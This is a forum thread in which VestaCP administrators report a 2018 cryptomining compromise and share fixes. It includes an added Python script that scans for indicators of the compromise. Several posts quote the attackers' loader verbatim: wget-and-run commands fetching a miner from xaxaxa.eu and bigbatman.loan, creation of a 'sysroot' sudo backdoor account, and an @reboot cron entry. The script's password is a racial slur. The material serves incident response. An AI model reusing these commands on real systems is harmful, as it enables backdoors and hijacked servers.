Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 8:13 am
by ScIT
aximus wrote: Tue Jun 26, 2018 8:11 am
I did exactly as you wrote.
Code:
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 amd64 no 2018-04-09
vesta-php 0.9.8 19 amd64 no 2018-01-23
vesta-nginx 0.9.8 20 amd64 no 2018-04-09
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.
please open another thread for this issue.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 8:15 am
by ScIT
jonny1960 wrote: Tue Jun 26, 2018 8:07 am
also was hacked tonight by mining virus
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc
http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json
http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Because I still have not got any information from other users: was your system infected with the patch installed or without it? The current patch is 0.9.8-22 and fixes the security issue.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 9:20 am
by aximus
ScIT wrote: Tue Jun 26, 2018 8:13 am
please open another thread for this issue - with release 20 you should also be safe for now.
As a last reply: I have fixed the issue by adding the right repositories to apt:
Code:
CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d
echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key
echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key
apt-get update && apt-get upgrade -y
This is normally done when installing Vesta, but somehow it got lost for my installation.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 9:21 am
by ScIT
aximus wrote: Tue Jun 26, 2018 9:20 am
ScIT wrote: Tue Jun 26, 2018 8:13 am
please open another thread for this issue - with release 20 you should also be safe for now.
As a last reply: I have fixed the issue by adding the right repositories to apt:
Code:
CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d
echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key
echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key
apt-get update && apt-get upgrade -y
This is normally done when installing Vesta, but somehow it got lost for my installation.
Glad that you found the solution on your own!
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 9:23 am
by jonny1960
ScIT wrote: Tue Jun 26, 2018 8:15 am
Because I still have not got any information from other users: was your system infected with the patch installed or without it? The current patch is 0.9.8-22 and fixes the security issue.
The hack happened on version 21; after updating to 22 and removing the virus, the issue stopped.
But now I have a problem with file_get_contents(): it does not work and does not send a request; an empty response comes back too fast. But curl_init() works.
Do you have an idea of what the problem may be?
file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 10:36 am
by Llorca
in Vesta CRON!!!!
wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
You must delete it and update.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 10:51 am
by ScIT
jonny1960 wrote: Tue Jun 26, 2018 9:23 am
ScIT wrote: Tue Jun 26, 2018 8:15 am
Because I still have not got any information from other users: was your system infected with the patch installed or without it? The current patch is 0.9.8-22 and fixes the security issue.
The hack happened on version 21; after updating to 22 and removing the virus, the issue stopped.
But now I have a problem with file_get_contents(): it does not work and does not send a request; an empty response comes back too fast. But curl_init() works.
Do you have an idea of what the problem may be?
file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Please open your own topic for this issue.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 10:53 am
by ScIT
I don't think that this alone will solve the issue. As already written, the update does NOT remove malware; it fixes the security issue. In my point of view: never trust a hacked server, you don't know what happened exactly and what the hacker (or script) has done with it. The best and safest way would be to reinstall the server and migrate the user content.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 12:43 pm
by delfo2000
Hi,
Tonight a hacker fucked me.
Code:
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa.eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
OK, I restored a snapshot from 2 days ago and updated to the latest vesta:
Code:
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-26
vesta-php 0.9.8 21 amd64 yes 2018-05-22
vesta-nginx 0.9.8 21 amd64 yes 2018-05-22
I closed port 8083 in my firewall. I think it is bad to use the default public vesta port, but changing the port doesn't solve the vestacp bug; the hacker used the login page.
Before the update I used 0.9.8-20.
Vestacp sent me an e-mail:
Code:
--2018-06-26 01:34:01-- http://xaxaxa.eu/load.sh Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’
0K 100% 116M=0s
2018-06-26 01:34:02 (116 MB/s) - ‘/tmp/load.sh’ saved [605/605]
chmod: invalid mode: ‘x’
Try 'chmod --help' for more information.
--2018-06-26 01:34:02-- http://xaxaxa.eu/gcc Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256576 (1.2M) [text/plain]
Saving to: ‘/tmp/gcc’
0K .......... .......... .......... .......... .......... 4% 168K 7s
50K .......... .......... .......... .......... .......... 8% 187K 6s
100K .......... .......... .......... .......... .......... 12% 269K 5s
150K .......... .......... .......... .......... .......... 16% 323K 5s
200K .......... .......... .......... .......... .......... 20% 320K 4s
250K .......... .......... .......... .......... .......... 24% 221K 4s
300K .......... .......... .......... .......... .......... 28% 80.1K 5s
350K .......... .......... .......... .......... .......... 32% 144K 5s
400K .......... .......... .......... .......... .......... 36% 210K 4s
450K .......... .......... .......... .......... .......... 40% 281K 4s
500K .......... .......... .......... .......... .......... 44% 286K 4s
550K .......... .......... .......... .......... .......... 48% 325K 3s
600K .......... .......... .......... .......... .......... 52% 436K 3s
650K .......... .......... .......... .......... .......... 57% 389K 2s
700K .......... .......... .......... .......... .......... 61% 446K 2s
750K .......... .......... .......... .......... .......... 65% 431K 2s
800K .......... .......... .......... .......... .......... 69% 470K 2s
850K .......... .......... .......... .......... .......... 73% 426K 1s
900K .......... .......... .......... .......... .......... 77% 399K 1s
950K .......... .......... .......... .......... .......... 81% 407K 1s
1000K .......... .......... .......... .......... .......... 85% 409K 1s
1050K .......... .......... .......... .......... .......... 89% 164K 1s
1100K .......... .......... .......... .......... .......... 93% 79.7M 0s
1150K .......... .......... .......... .......... .......... 97% 861K 0s
1200K .......... .......... ....... 100% 348K=4.5s
2018-06-26 01:34:07 (272 KB/s) - ‘/tmp/gcc’ saved [1256576/1256576]
chmod: cannot access ‘gcc’: No such file or directory
--2018-06-26 01:34:07-- http://xaxaxa.eu/config_1.json Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 681 [application/json]
Saving to: ‘/tmp/config_1.json’
0K 100% 49.5M=0s
2018-06-26 01:34:07 (49.5 MB/s) - ‘/tmp/config_1.json’ saved [681/681]
[sudo] password for admin: useradd: user 'sysroot' already exists
/tmp/load.sh: line 13: /tmp/gcc: Permission denied
/tmp/load.sh: line 15: /usr/local/vesta/bin/v-update-sys-vesta-all: Permission denied
Code:
--2018-06-26 01:34:01-- http://xaxaxa.eu/load.sh Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’
0K 100% 48.2M=0s
2018-06-26 01:34:02 (48.2 MB/s) - ‘/tmp/load.sh’ saved [605/605]
/bin/sh: /tmp/load.sh: Text file busy
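The loader script and cron entries posted in this thread give a defender a concrete set of indicators: the download hosts xaxaxa.eu and bigbatman.loan, the dropped files /tmp/gcc, /tmp/load.sh and /tmp/config_1.json, the @reboot crontab entry, the sysroot account with its sudoers line, and the xmrig process the script replaces. The Python triage script below is an added example and not code from the thread or from VestaCP. It scans text captured from a suspect host (crontab -l output, /etc/sudoers, /etc/passwd, a ps -eo pid,args listing and the v-list-sys-vesta-updates table) for those indicators and reports whether the installed vesta release is at or above 0.9.8-22, the release ScIT names as the fix. The sample inputs are constructed from what the thread shows; the cron schedule and the PIDs are invented for illustration. A hit confirms the compromise ScIT describes; it says nothing about what else was changed, which is why he recommends a reinstall rather than a cleanup.

```python
"""Triage scan for the xaxaxa.eu / bigbatman.loan mining malware described in this thread.

Added example; not code from the thread or from VestaCP. It works on text captured
from the suspect host (crontab -l, /etc/sudoers, /etc/passwd, ps -eo pid,args and
v-list-sys-vesta-updates output), so it can also be run offline against saved copies.
"""
import re
import sys

# Indicators taken from the loader scripts and cron entries posted in the thread.
MALWARE_HOSTS = ("xaxaxa.eu", "bigbatman.loan")
DROPPED_PATHS = ("/tmp/gcc", "/tmp/load.sh", "/tmp/config_1.json")
BACKDOOR_USER = "sysroot"   # account the script creates and appends to /etc/sudoers
MINER_NAMES = ("xmrig",)    # the script pkills xmrig before starting its own copy
FIXED_RELEASE = 22          # vesta 0.9.8-22 is the release named in the thread as the fix

# Constructed sample inputs; the cron schedule and the PIDs are invented for illustration.
SAMPLE_CRON = """# m h dom mon dow command
0 3 * * * /usr/local/vesta/bin/v-backup-users
@reboot /tmp/gcc -c /tmp/config_1.json
*/10 * * * * wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
"""
SAMPLE_SUDOERS = """root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
sysroot ALL=(ALL) ALL
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000::/home/admin:/bin/bash
sysroot:x:1001:1001::/home/sysroot:/bin/sh
"""
SAMPLE_PS = """  PID COMMAND
    1 /sbin/init
 2312 nginx: master process /usr/sbin/nginx
 4471 /tmp/gcc -c /tmp/config_1.json
"""
SAMPLE_PKGS = """PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 amd64 no 2018-04-09
vesta-php 0.9.8 19 amd64 no 2018-01-23
vesta-nginx 0.9.8 20 amd64 no 2018-04-09
"""


def _mentions_malware(line):
    return any(h in line for h in MALWARE_HOSTS) or any(p in line for p in DROPPED_PATHS)


def scan_cron(text):
    """Crontab lines (comments skipped) that fetch from the malware hosts or run the dropped files."""
    lines = (line.strip() for line in text.splitlines())
    return [line for line in lines if line and not line.startswith("#") and _mentions_malware(line)]


def scan_sudoers(text):
    """Sudoers entries granting the backdoor account rights, e.g. the appended 'sysroot ALL=(ALL) ALL'."""
    pattern = re.compile(r"^\s*%s\s+ALL\s*=" % re.escape(BACKDOOR_USER))
    return [line.strip() for line in text.splitlines() if pattern.match(line)]


def scan_passwd(text):
    """True if the backdoor account exists in the passwd content."""
    return any(line.split(":", 1)[0] == BACKDOOR_USER for line in text.splitlines())


def scan_processes(text):
    """Process-list lines (header skipped) running the dropped binary or a known miner."""
    hits = []
    for line in text.splitlines()[1:]:
        if _mentions_malware(line) or any(m in line.lower() for m in MINER_NAMES):
            hits.append(line.strip())
    return hits


def vesta_release(text):
    """REL number of the 'vesta' row in the v-list-sys-vesta-updates table, or None if absent."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0] == "vesta" and fields[2].isdigit():
            return int(fields[2])
    return None


def vesta_is_patched(text):
    rel = vesta_release(text)
    return rel is not None and rel >= FIXED_RELEASE


def triage(cron, sudoers, passwd, ps, pkgs):
    """Collect all findings; any non-empty list or a True backdoor_user means the host is compromised."""
    return {
        "cron": scan_cron(cron),
        "sudoers": scan_sudoers(sudoers),
        "backdoor_user": scan_passwd(passwd),
        "processes": scan_processes(ps),
        "vesta_release": vesta_release(pkgs),
        "patched": vesta_is_patched(pkgs),
    }


if __name__ == "__main__":
    # With five file arguments, scan captured files; otherwise scan the embedded samples.
    if len(sys.argv) == 6:
        inputs = [open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]]
    else:
        inputs = [SAMPLE_CRON, SAMPLE_SUDOERS, SAMPLE_PASSWD, SAMPLE_PS, SAMPLE_PKGS]
    for key, value in triage(*inputs).items():
        print("%-14s %s" % (key + ":", value))
```

Run it as `python3 triage.py cron.txt sudoers.txt passwd.txt ps.txt pkgs.txt` with files saved from the suspect host (collect crontabs for every user, not just the one you are logged in as, since the script installs its @reboot entry for whichever account ran the exploit); with no arguments it scans the embedded samples and reports the two cron entries, the sudoers line, the sysroot user, the running /tmp/gcc process and vesta release 20, which is below the fixed release.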
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 1:21 pm
by Spheerys
I have posted a quick and dirty tutorial to remove what I have found:
viewtopic.php?p=71564#p71564
In my case, and for the time it takes to move the hosted websites to a new server, it solves the issue.